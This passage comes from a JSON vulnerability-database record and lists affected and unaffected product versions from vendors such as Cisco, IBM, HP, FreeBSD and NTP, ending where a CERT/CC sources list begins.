      {
        "model": "video distribution suite for internet streaming",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.31"
      },
      {
        "model": "4.2.8p7",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.218"
      },
      {
        "model": "flexfabric taa-compliant switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79040"
      },
      {
        "model": "websphere datapower xc10 appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "vsr1004 comware virtual services router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "70"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.20"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "24g poe+ 4sfp+ 1-slot hi switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51300"
      },
      {
        "model": "p4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.2.4"
      },
      {
        "model": "ruggedcom rox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "2.9.0"
      },
      {
        "model": "linux x86 64 -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "10.1-beta3-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "netsight appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.4"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.3"
      },
      {
        "model": "dcm series 9900-digital content manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.3"
      },
      {
        "model": "flexfabric switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79100"
      },
      {
        "model": "10.1-rc3-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.0"
      },
      {
        "model": "dc switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125180"
      },
      {
        "model": "hsr6802 router chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "hsr6602-xg router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.7"
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75100"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.214"
      },
      {
        "model": "flexfabric 5700-32xgt-8xg-2qsfp+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "9.3-prerelease",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p21",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "flexfabric 4-slot taa-compliant switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59300"
      },
      {
        "model": "smartcloud entry fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.19"
      },
      {
        "model": "9.3-release-p24",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "extremexos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "16.2"
      },
      {
        "model": "smartcloud entry appliance fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.4"
      },
      {
        "model": "10.1-release-p19",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "hsr6804 router chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.4.1.0"
      },
      {
        "model": "ac switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125040"
      },
      {
        "model": "ruggedcom rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "2.6.2"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "5900af-48g-4xg-2qsfp+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "9.3-release-p13",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.1-prerelease",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "msr3024 ac router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "purview appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.113"
      },
      {
        "model": "ff 5900cp-48xg-4qsfp+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "network device security assessment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smartcloud entry appliance fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.0.4"
      },
      {
        "model": "24g 4sfp+ 1-slot hi switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51300"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.11"
      },
      {
        "model": "asa cx and cisco prime security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "5920af-24xg switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "flexfabric 4-slot switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59300"
      },
      {
        "model": "nac appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.0"
      },
      {
        "model": "flexfabric 5700-40xg-2qsfp+ taa-compliant switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "msr2003 ac router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "msr4000 taa-compliant mpu-100 main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "ruggedcom rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "1.16"
      },
      {
        "model": "9.3-release-p29",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.110"
      },
      {
        "model": "standalone rack server cimc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0.0"
      },
      {
        "model": "flexfabric main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129160"
      },
      {
        "model": "9.3-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "purview appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.3"
      },
      {
        "model": "9.3-rc3-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.2"
      },
      {
        "model": "flexfabric main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129100"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.21"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.36"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nac appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.3"
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125080"
      },
      {
        "model": "telepresence sx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "9.3-rc1-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.1-rc4-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "meetingplace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "48g 4sfp+ hi 1-slot switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55100"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "smartcloud entry appliance fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.0.3"
      },
      {
        "model": "unified computing system e-series blade server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.0"
      },
      {
        "model": "ntp",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.3.92"
      },
      {
        "model": "flexfabric taa-compliant main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129100"
      },
      {
        "model": "p74",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.2.5"
      },
      {
        "model": "expressway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smartcloud entry appliance fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.4"
      },
      {
        "model": "flexfabric 5700-48g-4xg-2qsfp+ taa-compliant switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "5900af 48xgt 4qsfp+ taa-compliant switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "4.2.8p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "10.1-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3000"
      },
      {
        "model": "extremexos patch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.7.31"
      },
      {
        "model": "10.2-beta2-p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "msr3012 ac router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smartcloud entry appliance fi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0.4"
      },
      {
        "model": "management heartbeat server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flex system fc3171 8gb san switch and san pass-thru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.7.03.00"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.09"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "smartcloud entry appliance fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.4"
      },
      {
        "model": "real-time compression appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.17"
      },
      {
        "model": "p6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.2.4"
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105040"
      },
      {
        "model": "connected grid routers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125180"
      },
      {
        "model": "telepresence integrator c series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "taa switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105040"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "p7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.2.4"
      },
      {
        "model": "nac server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smartcloud entry appliance fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.3"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.3"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.12"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.01"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.1.2"
      },
      {
        "model": "p5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.2.4"
      },
      {
        "model": "flexfabric 2.4tbps taa-compliant fabric/main processing uni",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79100"
      },
      {
        "model": "nac appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "5130-48g-4sfp+ ei switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.3"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.09"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.02"
      },
      {
        "model": "a12508 switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "application policy infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "5130-24g-2sfp+-2xgt ei switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.3.25"
      },
      {
        "model": "network analysis module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "4.2.8p4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.6.4"
      },
      {
        "model": "purview appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.4"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1.0.0"
      },
      {
        "model": "identity services engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.3"
      },
      {
        "model": "5130-48g-2sfp+-2xgt ei switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "4.2.8p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "nac appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.4"
      },
      {
        "model": "telepresence ex series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "msr1002-4 ac router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105120"
      },
      {
        "model": "qlogic virtual fabric extension module for ibm bladecenter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "4.2.7p11",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "5900af-48xg-4qsfp+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "type d main processing unit with comware os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10500v70"
      },
      {
        "model": "taa switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105120"
      },
      {
        "model": "smartcloud entry jre update",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.0.34"
      },
      {
        "model": "vsr1001 virtual services router day evaluation software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "600"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "24g sfp 4sfp+ hi 1-slot switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55100"
      },
      {
        "model": "10.2-release-p6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.2-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "5920af-24xg taa switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.010"
      },
      {
        "model": "junos os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "flexfabric switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79040"
      },
      {
        "model": "flexfabric 12908e switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.2"
      },
      {
        "model": "9.3-beta1-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "linux -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "telepresence conductor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "security access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "content security appliance updater servers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "flexfabric taa-compliant switch ac chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129100"
      },
      {
        "model": "10.1-release-p16",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified communications manager session management edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flexfabric 5700-40xg-2qsfp+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "9.3-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75020"
      },
      {
        "model": "support central",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "9.3-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "ff 12518e ac switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "small business series wireless access points",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5000"
      },
      {
        "model": "virtual security gateway for microsoft hyper-v",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "p4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.2.2"
      },
      {
        "model": "flexfabric 5900cp 48xg 4qsfp+ taa-compliant",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "prime service catalog virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "access registrar appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "24g poe+ 4sfp+ hi 1-slot switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55100"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.3.90"
      },
      {
        "model": "hsr6602-g router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "videoscape control suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "1950-48g-2sfp+-2xgt-poe+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "telepresence mx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs central",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence profile series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "msr3024 poe router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "a12518 switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "visual quality experience tools server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.4"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.7.2"
      },
      {
        "model": "im and presence service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ruggedcom rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "2.0"
      },
      {
        "model": "ruggedcom rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "2.6.3"
      },
      {
        "model": "flexfabric switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11908-v0"
      },
      {
        "model": "smartcloud entry appliance fi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.0.4"
      },
      {
        "model": "cloud object store",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.2-prerelease",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10508-v0"
      },
      {
        "model": "qlogic 8gb intelligent pass-thru module and san switch module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.10"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.4"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.3"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.2"
      },
      {
        "model": "integrated lights out manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2"
      },
      {
        "model": "integrated lights out manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.1"
      },
      {
        "model": "integrated lights out manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.0"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
